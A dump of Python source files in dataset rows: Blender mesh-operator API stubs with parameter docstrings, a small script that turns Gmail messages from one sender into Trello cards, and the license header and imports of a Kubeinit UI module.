:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def primitive_cube_add_gizmo(
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0),
matrix: float = ((0.0, 0.0, 0.0, 0.0), (0.0, 0.0, 0.0, 0.0),
(0.0, 0.0, 0.0, 0.0), (0.0, 0.0, 0.0, 0.0))):
'''Construct a cube mesh
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
:param matrix: Matrix
:type matrix: float
'''
pass
def primitive_cylinder_add(vertices: int = 32,
radius: float = 1.0,
depth: float = 2.0,
end_fill_type: typing.Union[int, str] = 'NGON',
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a cylinder mesh
:param vertices: Vertices
:type vertices: int
:param radius: Radius
:type radius: float
:param depth: Depth
:type depth: float
:param end_fill_type: Cap Fill TypeNOTHING Nothing, Don’t fill at all.NGON Ngon, Use ngons.TRIFAN Triangle Fan, Use triangle fans.
:type end_fill_type: typing.Union[int, str]
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def primitive_grid_add(x_subdivisions: int = 10,
y_subdivisions: int = 10,
size: float = 2.0,
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a grid mesh
:param x_subdivisions: X Subdivisions
:type x_subdivisions: int
:param y_subdivisions: Y Subdivisions
:type y_subdivisions: int
:param size: Size
:type size: float
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def primitive_ico_sphere_add(subdivisions: int = 2,
radius: float = 1.0,
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct an Icosphere mesh
:param subdivisions: Subdivisions
:type subdivisions: int
:param radius: Radius
:type radius: float
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def primitive_monkey_add(size: float = 2.0,
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a Suzanne mesh
:param size: Size
:type size: float
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def primitive_plane_add(size: float = 2.0,
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a filled planar mesh with 4 vertices
:param size: Size
:type size: float
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def primitive_torus_add(align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0),
major_segments: int = 48,
minor_segments: int = 12,
mode: typing.Union[int, str] = 'MAJOR_MINOR',
major_radius: float = 1.0,
minor_radius: float = 0.25,
abso_major_rad: float = 1.25,
abso_minor_rad: float = 0.75,
generate_uvs: bool = True):
'''Construct a torus mesh
:param align: AlignWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location
:type location: float
:param rotation: Rotation
:type rotation: float
:param major_segments: Major Segments, Number of segments for the main ring of the torus
:type major_segments: int
:param minor_segments: Minor Segments, Number of segments for the minor ring of the torus
:type minor_segments: int
:param mode: Torus DimensionsMAJOR_MINOR Major/Minor, Use the major/minor radii for torus dimensions.EXT_INT Exterior/Interior, Use the exterior/interior radii for torus dimensions.
:type mode: typing.Union[int, str]
:param major_radius: Major Radius, Radius from the origin to the center of the cross sections
:type major_radius: float
:param minor_radius: Minor Radius, Radius of the torus’ cross section
:type minor_radius: float
:param abso_major_rad: Exterior Radius, Total Exterior Radius of the torus
:type abso_major_rad: float
:param abso_minor_rad: Interior Radius, Total Interior Radius of the torus
:type abso_minor_rad: float
:param generate_uvs: Generate UVs, Generate a default UV map
:type generate_uvs: bool
'''
pass
def primitive_uv_sphere_add(segments: int = 32,
ring_count: int = 16,
radius: float = 1.0,
calc_uvs: bool = True,
enter_editmode: bool = False,
align: typing.Union[int, str] = 'WORLD',
location: float = (0.0, 0.0, 0.0),
rotation: float = (0.0, 0.0, 0.0)):
'''Construct a UV sphere mesh
:param segments: Segments
:type segments: int
:param ring_count: Rings
:type ring_count: int
:param radius: Radius
:type radius: float
:param calc_uvs: Generate UVs, Generate a default UV map
:type calc_uvs: bool
:param enter_editmode: Enter Editmode, Enter editmode when adding this object
:type enter_editmode: bool
:param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object.
:type align: typing.Union[int, str]
:param location: Location, Location for the newly added object
:type location: float
:param rotation: Rotation, Rotation for the newly added object
:type rotation: float
'''
pass
def quads_convert_to_tris(quad_method: typing.Union[int, str] = 'BEAUTY',
ngon_method: typing.Union[int, str] = 'BEAUTY'):
'''Triangulate selected faces
:param quad_method: Quad Method, Method for splitting the quads into trianglesBEAUTY Beauty , Split the quads in nice triangles, slower method.FIXED Fixed, Split the quads on the first and third vertices.FIXED_ALTERNATE Fixed Alternate, Split the quads on the 2nd and 4th vertices.SHORTEST_DIAGONAL Shortest Diagonal, Split the quads based on the distance between the vertices.
:type quad_method: typing.Union[int, str]
:param ngon_method: Polygon Method, Method for splitting the polygons into trianglesBEAUTY Beauty, Arrange the new triangles evenly (slow).CLIP Clip, Split the polygons with an ear clipping algorithm.
:type ngon_method: typing.Union[int, str]
'''
pass
def region_to_loop():
'''Select boundary edges around the selected faces
'''
pass
def remove_doubles(threshold: float = 0.0001, use_unselected: bool = False):
'''Merge vertices based on their proximity
:param threshold: Merge Distance, Maximum distance between elements to merge
:type threshold: float
:param use_unselected: Unselected, Merge selected to other unselected vertices
:type use_unselected: bool
'''
pass
def reveal(select: bool = True):
'''Reveal all hidden vertices, edges and faces
:param select: Select
:type select: bool
'''
pass
def rip(mirror: bool = False,
use_proportional_edit: bool = False,
proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',
proportional_size: float = 1.0,
use_proportional_connected: bool = False,
use_proportional_projected: bool = False,
release_confirm: bool = False,
use_accurate: bool = False,
use_fill: bool = False):
'''Disconnect vertex or edges from connected geometry
:param mirror: Mirror Editing
:type mirror: bool
:param use_proportional_edit: Proportional Editing
:type use_proportional_edit: bool
:param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff.
:type proportional_edit_falloff: typing.Union[int, str]
:param proportional_size: Proportional Size
:type proportional_size: float
:param use_proportional_connected: Connected
:type use_proportional_connected: bool
:param use_proportional_projected: Projected (2D)
:type use_proportional_projected: bool
:param release_confirm: Confirm on Release, Always confirm operation when releasing button
:type release_confirm: bool
:param use_accurate: Accurate, Use accurate transformation
:type use_accurate: bool
:param use_fill: Fill, Fill the ripped region
:type use_fill: bool
'''
pass
def rip_edge(mirror: bool = False,
use_proportional_edit: bool = False,
proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',
proportional_size: float = 1.0,
use_proportional_connected: bool = False,
use_proportional_projected: bool = False,
release_confirm: bool = False,
use_accurate: bool = False):
'''Extend vertices along the edge closest to the cursor
:param mirror: Mirror Editing
:type mirror: bool
:param use_proportional_edit: Proportional Editing
:type use_proportional_edit: bool
:param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff.
:type proportional_edit_falloff: typing.Union[int, str]
:param proportional_size: Proportional Size
:type proportional_size: float
:param use_proportional_connected: Connected
:type use_proportional_connected: bool
:param use_proportional_projected: Projected (2D)
:type use_proportional_projected: bool
:param release_confirm: Confirm on Release, Always confirm operation when releasing button
:type release_confirm: bool
:param use_accurate: Accurate, Use accurate transformation
:type use_accurate: bool
'''
pass
def rip_edge_move(MESH_OT_rip_edge=None, TRANSFORM_OT_translate=None):
'''Extend vertices and move the result
:param MESH_OT_rip_edge: Extend Vertices, Extend vertices along the edge closest to the cursor
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def rip_move(MESH_OT_rip=None, TRANSFORM_OT_translate=None):
'''Rip polygons and move the result
:param MESH_OT_rip: Rip, Disconnect vertex or edges from connected geometry
:param TRANSFORM_OT_translate: Move, Move selected items
'''
pass
def screw(steps: int = 9,
turns: int = 1,
center: float = (0.0, 0.0, 0.0),
axis: float = (0.0, 0.0, 0.0)):
'''Extrude selected vertices in screw-shaped rotation around the cursor in indicated viewport
:param steps: Steps, Steps
:type steps: int
:param turns: Turns, Turns
:type turns: int
:param center: Center, Center in global view space
:type center: float
:param axis: Axis, Axis in global view space
:type axis: float
'''
pass
def select_all(action: typing.Union[int, str] = 'TOGGLE'):
'''(De)select all vertices, edges or faces
:param action: Action, Selection action to executeTOGGLE Toggle, Toggle selection for all elements.SELECT Select, Select all elements.DESELECT Deselect, Deselect all elements.INVERT Invert, Invert selection of all elements.
:type action: typing.Union[int, str]
'''
pass
def select_axis(orientation: typing.Union[int, str] = 'LOCAL',
sign: typing.Union[int, str] = 'POS',
axis: typing.Union[int, str] = 'X',
threshold: float = 0.0001):
'''Select all data in the mesh on a single axis
:param orientation: Axis Mode, Axis orientationGLOBAL Global, Align the transformation axes to world space.LOCAL Local, Align the transformation axes to the selected objects’ local space.NORMAL Normal, Align the transformation axes to average normal of selected elements (bone Y axis for pose mode).GIMBAL Gimbal, Align each axis to the Euler rotation axis as used for input.VIEW View, Align the transformation axes to the window.CURSOR Cursor, Align the transformation axes to the 3D cursor.
:type orientation: typing.Union[int, str]
:param sign: Axis Sign, Side to select
:type sign: typing.Union[int, str]
:param axis: Axis, Select the axis to compare each vertex on
:type axis: typing.Union[int, str]
:param threshold: Threshold
:type threshold: float
'''
pass
def select_face_by_sides(number: int = 4,
type: typing.Union[int, str] = 'EQUAL',
extend: bool = True):
'''Select vertices or faces by the number of polygon sides
:param number: Number of Vertices
:type number: int
:param type: Type, Type of comparison to make
:type type: typing.Union[int, str]
:param extend: Extend, Extend the selection
:type extend: bool
'''
pass
def select_interior_faces():
'''Select faces where all edges have more than 2 face users
'''
pass
def select_less(use_face_step: bool = True):
'''Deselect vertices, edges or faces at the boundary of each selection region
:param use_face_step: Face Step, Connected faces (instead of edges)
:type use_face_step: bool
'''
pass
def select_linked(delimit: typing.Set[typing.Union[int, str]] = {'SEAM'}):
'''Select all vertices connected to the current selection
:param delimit: Delimit, Delimit selected regionNORMAL Normal, Delimit by face directions.MATERIAL Material, Delimit by face material.SEAM Seam, Delimit by edge seams.SHARP Sharp, Delimit by sharp edges.UV UVs, Delimit by UV coordinates.
:type delimit: typing.Set[typing.Union[int, str]]
'''
pass
def select_linked_pick(deselect: bool = False,
delimit: typing.Set[typing.Union[int, str]] = {'SEAM'},
index=-1):
'''(De)select all vertices linked to the edge under the mouse cursor
:param deselect: Deselect
:type deselect: bool
:param delimit: Delimit, Delimit selected regionNORMAL Normal, Delimit by face directions.MATERIAL Material, Delimit by face material.SEAM Seam, Delimit by edge seams.SHARP Sharp, Delimit by sharp edges.UV UVs, Delimit by UV coordinates.
:type delimit: typing.Set[typing.Union[int, str]]
'''
pass
def select_loose(extend: bool = False):
'''Select loose geometry based on the selection mode
:param extend: Extend, Extend the selection
:type extend: bool
'''
pass
def select_mirror(axis: typing.Set[typing.Union[int, str]] = {'X'},
extend: bool = False):
'''Select mesh items at mirrored locations
:param axis: Axis
:type axis: typing.Set[typing.Union[int, str]]
:param extend: Extend, Extend the existing selection
:type extend: bool
'''
pass
def select_mode(use_extend: bool = False,
use_expand: bool = False,
type: typing.Union[int, str] = 'VERT',
action: typing.Union[int, str] = 'TOGGLE'):
'''Change selection mode
:param use_extend: Extend
:type use_extend: bool
:param use_expand: Expand
:type use_expand: bool
:param type: TypeVERT Vertex, Vertex selection mode.EDGE Edge, Edge selection mode.FACE Face, Face selection mode.
:type type: typing.Union[int, str]
:param action: Action, Selection action to executeDISABLE Disable, Disable selected markers.ENABLE Enable, Enable selected markers.TOGGLE Toggle, Toggle disabled flag for selected markers.
:type action: typing.Union[int, str]
'''
pass
def select_more(use_face_step: bool = True):
'''Select more vertices, edges or faces connected to initial selection
:param use_face_step: Face Step, Connected faces (instead of edges)
:type use_face_step: bool
'''
pass
def select_next_item():
'''Select the next element (using selection order)
'''
pass
def select_non_manifold(extend: bool = True,
use_wire: bool = True,
use_boundary: bool = True,
use_multi_face: bool = True,
use_non_contiguous: bool = True,
use_verts: bool = True):
'''Select all non-manifold vertices or edges
:param extend: Extend, Extend the selection
:type extend: bool
:param use_wire: Wire, Wire edges
:type use_wire: bool
:param use_boundary: Boundaries, Boundary edges
:type use_boundary: bool
:param use_multi_face: Multiple Faces, Edges shared by 3+ faces
:type use_multi_face: bool
:param use_non_contiguous: Non Contiguous, Edges between faces pointing in alternate directions
:type use_non_contiguous: bool
:param use_verts: Vertices, Vertices connecting multiple face regions
:type use_verts: bool
'''
pass
def select_nth(skip: int = 1, nth: int = 1, offset: int = 0):
'''Deselect every Nth element starting from the active vertex, edge or face
:param skip: Deselected, Number of deselected elements in the repetitive sequence
:type skip: int
:param nth: Selected, Number of selected elements in the repetitive sequence
:type nth: int
:param offset: Offset, Offset from the starting point
:type offset: int
'''
pass
def select_prev_item():
'''Select the previous element (using selection order)
'''
pass
def select_random(percent: float = 50.0,
seed: int = 0,
action: typing.Union[int, str] = 'SELECT'):
'''Randomly select vertices
:param percent: Percent, Percentage of objects to select randomly
:type percent: float
:param seed: Random Seed, Seed for the random number generator
:type seed: int
:param action: Action, Selection action to executeSELECT Select, Select all elements.DESELECT Deselect, Deselect all elements.
:type action: typing.Union[int, str]
'''
pass
def select_similar(type: typing.Union[int, str] = 'NORMAL',
compare: typing.Union[int, str] = 'EQUAL',
threshold: float = 0.0):
'''Select similar vertices, edges or faces by property types
:param type: Type
:type type: typing.Union[int, str]
:param compare: Compare
:type compare: typing.Union[int, str]
:param threshold: Threshold
:type threshold: float
'''
pass
def select_similar_region():
'''Select similar face regions to the current selection
'''
pass
def select_ungrouped(extend: bool = False):
'''Select vertices without a group
:param extend: Extend, Extend the selection
:type extend: bool
'''
pass
def separate(type: typing.Union[int, str] = 'SELECTED'):
'''Separate selected geometry into a new mesh
:param type: Type
:type type: typing.Union[int, str]
'''
pass
def set_normals_from_faces(keep_sharp: bool = False):
'''Set the custom normals from the selected faces ones
:param keep_sharp: Keep Sharp Edges, Do not set sharp edges to face
:type keep_sharp: bool
'''
pass
def shape_propagate_to_all():
'''Apply selected vertex locations to all other shape keys
'''
pass
def shortest_path_pick(edge_mode: typing.Union[int, str] = 'SELECT',
use_face_step: bool = False,
use_topology_distance: bool = False,
use_fill: bool = False,
skip: int = 0,
nth: int = 1,
offset: int = 0,
index=-1):
'''Select shortest path between two selections
:param edge_mode: Edge Tag, The edge flag to tag when selecting the shortest path
:type edge_mode: typing.Union[int, str]
:param use_face_step: Face Stepping, Traverse connected faces (includes diagonals and edge-rings)
:type use_face_step: bool
:param use_topology_distance: Topology Distance, Find the minimum number of steps, ignoring spatial distance
:type use_topology_distance: bool
:param use_fill: Fill Region, Select all paths between the source/destination elements
:type use_fill: bool
:param skip: Deselected, Number of deselected elements in the repetitive sequence
:type skip: int
:param nth: Selected, Number of selected elements in the repetitive sequence
:type nth: int
:param offset: Offset, Offset from the starting point
:type offset: int
'''
pass
def shortest_path_select(edge_mode: typing.Union[int, str] = 'SELECT',
use_face_step: bool = False,
use_topology_distance: bool = False,
use_fill: bool = False,
skip: int = 0,
nth: int = 1,
offset: int = 0):
'''Selected shortest path between two vertices/edges/faces
:param edge_mode: Edge Tag, The edge flag to tag when selecting the shortest path
:type edge_mode: typing.Union[int, str]
:param use_face_step: Face Stepping, Traverse connected faces (includes diagonals and edge-rings)
:type use_face_step: bool
:param use_topology_distance: Topology Distance, Find the minimum number of steps, ignoring spatial distance
:type use_topology_distance: bool
:param use_fill: Fill Region, Select all paths between the source/destination elements
:type use_fill: bool
:param skip: Deselected, Number of deselected elements in the repetitive sequence
:type skip: int
:param nth: Selected, Number of selected elements in the repetitive sequence
:type nth: int
:param offset: Offset, Offset from the starting point
:type offset: int
'''
pass
def smoothen_normals(factor: float = 0.5):
'''Smoothen custom normals based on adjacent vertex normals
:param factor: Factor, Specifies weight of smooth vs original normal
:type factor: float
'''
pass
def solidify(thickness: float = 0.01):
'''Create a solid skin by extruding, compensating for sharp angles
:param thickness: Thickness
:type thickness: float
'''
pass
def sort_elements(type: typing.Union[int, str] = 'VIEW_ZAXIS',
elements: typing.Set[typing.Union[int, str]] = {'VERT'},
reverse: bool = False,
seed: int = 0):
'''The order of selected vertices/edges/faces is modified, based on a given method
:param type: Type, Type of re-ordering operation to applyVIEW_ZAXIS View Z Axis, Sort selected elements from farthest to nearest one in current view.VIEW_XAXIS View X Axis, Sort selected elements from left to right one in current view.CURSOR_DISTANCE Cursor Distance, Sort selected elements from nearest to farthest from 3D cursor.MATERIAL Material, Sort selected elements from smallest to greatest material index (faces only!).SELECTED Selected, Move all selected elements in first places, preserving their relative order (WARNING: this will affect unselected elements’ indices as well!).RANDOMIZE Randomize, Randomize order of selected elements.REVERSE Reverse, Reverse current order of selected elements.
:type type: typing.Union[int, str]
:param elements: Elements, Which elements to affect (vertices, edges and/or faces)
:type elements: typing.Set[typing.Union[int, str]]
:param reverse: Reverse, Reverse the sorting effect
:type reverse: bool
:param seed: Seed, Seed for random-based operations
:type seed: int
'''
pass
def spin(steps: int = 9,
dupli: bool = False,
angle: float = 1.5708,
use_auto_merge: bool = True,
use_normal_flip: bool = False,
center: float = (0.0, 0.0, 0.0),
axis: float = (0.0, 0.0, 0.0)):
'''Extrude selected vertices in a circle around the cursor in indicated viewport
:param steps: Steps, Steps
:type steps: int
:param dupli: Use Duplicates
:type dupli: bool
:param angle: Angle, Rotation for each step
:type angle: float
:param use_auto_merge: Auto Merge, Merge first/last when the angle is a full revolution
:type use_auto_merge: bool
:param use_normal_flip: Flip Normals
:type use_normal_flip: bool
:param center: Center, Center in global view space
:type center: float
:param axis: Axis, Axis in global view space
:type axis: float
'''
pass
def split():
'''Split off selected geometry from connected unselected geometry
'''
pass
def split_normals():
'''Split custom normals of selected vertices
'''
pass
def subdivide(number_cuts: int = 1,
smoothness: float = 0.0,
ngon: bool = True,
quadcorner: typing.Union[int, str] = 'STRAIGHT_CUT',
fractal: float = 0.0,
fractal_along_normal: float = 0.0,
seed: int = 0):
'''Subdivide selected edges
:param number_cuts: Number of Cuts
:type number_cuts: int
:param smoothness: Smoothness, Smoothness factor
:type smoothness: float
:param ngon: Create N-Gons, When disabled, newly created faces are limited to 3-4 sided faces
:type ngon: bool
:param quadcorner: Quad Corner Type, How to subdivide quad corners (anything other than Straight Cut will prevent ngons)
:type quadcorner: typing.Union[int, str]
:param fractal: Fractal, Fractal randomness factor
:type fractal: float
:param fractal_along_normal: Along Normal, Apply fractal displacement along normal only
:type fractal_along_normal: float
:param seed: Random Seed, Seed for the random number generator
:type seed: int
'''
pass
def subdivide_edgering(number_cuts: int = 10,
interpolation: typing.Union[int, str] = 'PATH',
smoothness: float = 1.0,
profile_shape_factor: float = 0.0,
profile_shape: typing.Union[int, str] = 'SMOOTH'):
'''Subdivide perpendicular edges to the selected edge ring
:param number_cuts: Number of Cuts
:type number_cuts: int
:param interpolation: Interpolation, Interpolation method
:type interpolation: typing.Union[int, str]
:param smoothness: Smoothness, Smoothness factor
:type smoothness: float
:param profile_shape_factor: Profile Factor, How much intermediary new edges are shrunk/expanded
:type profile_shape_factor: float
:param profile_shape: Profile Shape, Shape of the profileSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.
:type profile_shape: typing.Union[int, str]
'''
pass
def symmetrize(direction: typing.Union[int, str] = 'NEGATIVE_X',
threshold: float = 0.0001):
'''Enforce symmetry (both form and topological) across an axis
:param direction: Direction, Which sides to copy from and to
:type direction: typing.Union[int, str]
:param threshold: Threshold, Limit for snap middle vertices to the axis center
:type threshold: float
'''
pass
def symmetry_snap(direction: typing.Union[int, str] = 'NEGATIVE_X',
threshold: float = 0.05,
factor: float = 0.5,
use_center: bool = True):
'''Snap vertex pairs to their mirrored locations
:param direction: Direction, Which sides to copy from and to
:type direction: typing.Union[int, str]
:param threshold: Threshold, Distance within which matching vertices are searched
:type threshold: float
:param factor: Factor, Mix factor of the locations of the vertices
:type factor: float
:param use_center: Center, Snap middle vertices to the axis center
:type use_center: bool
'''
pass
def tris_convert_to_quads(face_threshold: float = 0.698132,
shape_threshold: float = 0.698132,
uvs: bool = False,
vcols: bool = False,
seam: bool = False,
sharp: bool = False,
materials: bool = False):
'''Join triangles into quads
:param face_threshold: Max Face Angle, Face angle limit
:type face_threshold: float
:param shape_threshold: Max Shape Angle, Shape angle limit
:type shape_threshold: float
:param uvs: Compare UVs
:type uvs: bool
:param vcols: Compare VCols
:type vcols: bool
:param seam: Compare Seam
:type seam: bool
:param sharp: Compare Sharp
:type sharp: bool
:param materials: Compare Materials
:type materials: bool
'''
pass
def unsubdivide(iterations: int = 2):
'''UnSubdivide selected edges & faces
:param iterations: Iterations, Number of times to unsubdivide
:type iterations: int
'''
pass
def uv_texture_add():
'''Add UV Map
'''
pass
def uv_texture_remove():
'''Remove UV Map
'''
pass
def uvs_reverse():
'''Flip direction of UV coordinates inside faces
'''
pass
def uvs_rotate(use_ccw: bool = False):
'''Rotate UV coordinates inside faces
:param use_ccw: Counter Clockwise
:type use_ccw: bool
'''
pass
def vert_connect():
'''Connect selected vertices of faces, splitting the face
'''
pass
def vert_connect_concave():
'''Make all faces convex
'''
pass
def vert_connect_nonplanar(angle_limit: float = 0.0872665):
'''Split non-planar faces that exceed the angle threshold
:param angle_limit: Max Angle, Angle limit
:type angle_limit: float
'''
pass
def vert_connect_path():
'''Connect vertices by their selection order, creating edges, splitting faces
'''
pass
def vertex_color_add():
'''Add vertex color layer
'''
pass
def vertex_color_remove():
'''Remove vertex color layer
'''
pass
def vertices_smooth(factor: float = 0.5,
repeat: int = 1,
xaxis: bool = True,
yaxis: bool = True,
zaxis: bool = True):
'''Flatten angles of selected vertices
:param factor: Smoothing, Smoothing factor
:type factor: float
:param repeat: Repeat, Number of times to smooth the mesh
:type repeat: int
:param xaxis: X-Axis, Smooth along the X axis
:type xaxis: bool
:param yaxis: Y-Axis, Smooth along the Y axis
:type yaxis: bool
:param zaxis: Z-Axis, Smooth along the Z axis
:type zaxis: bool
'''
pass
def vertices_smooth_laplacian(repeat: int = 1,
lambda_factor: float = 1.0,
lambda_border: float = 5e-05,
use_x: bool = True,
use_y: bool = True,
use_z: bool = True,
preserve_volume: bool = True):
'''Laplacian smooth of selected vertices
:param repeat: Number of iterations to smooth the mesh
:type repeat: int
:param lambda_factor: Lambda factor
:type lambda_factor: float
:param lambda_border: Lambda factor in border
:type lambda_border: float
:param use_x: Smooth X Axis, Smooth object along X axis
:type use_x: bool
:param use_y: Smooth Y Axis, Smooth object along Y axis
:type use_y: bool
:param use_z: Smooth Z Axis, Smooth object along Z axis
:type use_z: bool
:param preserve_volume: Preserve Volume, Apply volume preservation after smooth
:type preserve_volume: bool
'''
pass
def wireframe(use_boundary: bool = True,
use_even_offset: bool = True,
use_relative_offset: bool = False,
use_replace: bool = True,
thickness: float = 0.01,
offset: float = 0.01,
use_crease: bool = False,
crease_weight: float = 0.01):
'''Create a solid wire-frame from faces
:param use_boundary: Boundary, Inset face boundaries
:type use_boundary: bool
:param use_even_offset: Offset Even, Scale the offset to give more even thickness
:type use_even_offset: bool
:param use_relative_offset: Offset Relative, Scale the offset by surrounding geometry
:type use_relative_offset: bool
:param use_replace: Replace, Remove original faces
:type use_replace: bool
:param thickness: Thickness
:type thickness: float
:param offset: Offset
:type offset: float
:param use_crease: Crease, Crease hub edges for improved subsurf
:type use_crease: bool
:param crease_weight: Crease weight
:type crease_weight: float
'''
pass
|
py | 1a304933cb80e62027c2631ddc0202f5385045a8 | from imbox import Imbox
import html2text
import requests
import json
import time
with open('config.json') as config_file:
data = json.load(config_file)
API_KEY = data['API_KEY']
OAUTH_TOKEN = data['OAUTH_TOKEN']
trello_list_id = data['trello_list_id']
# SSL Context docs https://docs.python.org/3/library/ssl.html#ssl.create_default_context
def get_text(content):
html = (str(content))
text_maker = html2text.HTML2Text()
text_maker.ignore_links = True
text_maker.bypass_tables = False
text = text_maker.handle(html)
# Slice everything that comes between html': and ]}
start = "html':"
end = "]}"
mail_content = text[text.find(start) + len(start):text.rfind(end)]
# Normalize content, removing unknown chars
mail_content = mail_content.replace("['","")
mail_content = mail_content.replace('\\xa0', ' ')
mail_content = mail_content.replace("\\r\\n'","")
return mail_content
def send_to_trello(mail_content,subject):
r = requests.post("https://api.trello.com/1/cards?key=" + \
API_KEY + "&token=" + OAUTH_TOKEN + \
"&name=" + subject + "&idList=" + \
trello_list_id + "&desc=" + \
mail_content)
return r
with Imbox('imap.gmail.com',
username = data['mail_username'],
password = data['mail_password'],
ssl = True,
ssl_context = None,
starttls = False) as imbox:
fetch_mail_type = imbox.messages(sent_from = data['mail_from_username'])
# Get all folders
#status, folders_with_additional_info = imbox.folders()
# Gets all messages from the inbox
#all_inbox_messages = imbox.messages()
for uid, message in fetch_mail_type:
# Every message is an object with the following keys
origin = message.sent_from
receiver = message.sent_to
subject = message.subject
headers = message.headers
message_id = message.message_id
message_date = message.date
content = message.body
message_attachments = message.attachments
result = get_text(content)
response = send_to_trello(result,subject)
if response.status_code == 200:
#imbox.mark_seen(uid)
imbox.delete(uid)
time.sleep(1) |
py | 1a304b706f06264e84f92dd35e7e8243b8a98c9c | #!/usr/bin/env python
"""
Copyright 2019 Kubeinit (kubeinit.com).
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations
under the License.
"""
import app
from app import version as kubeinit_ui_version
from app.base import blueprint
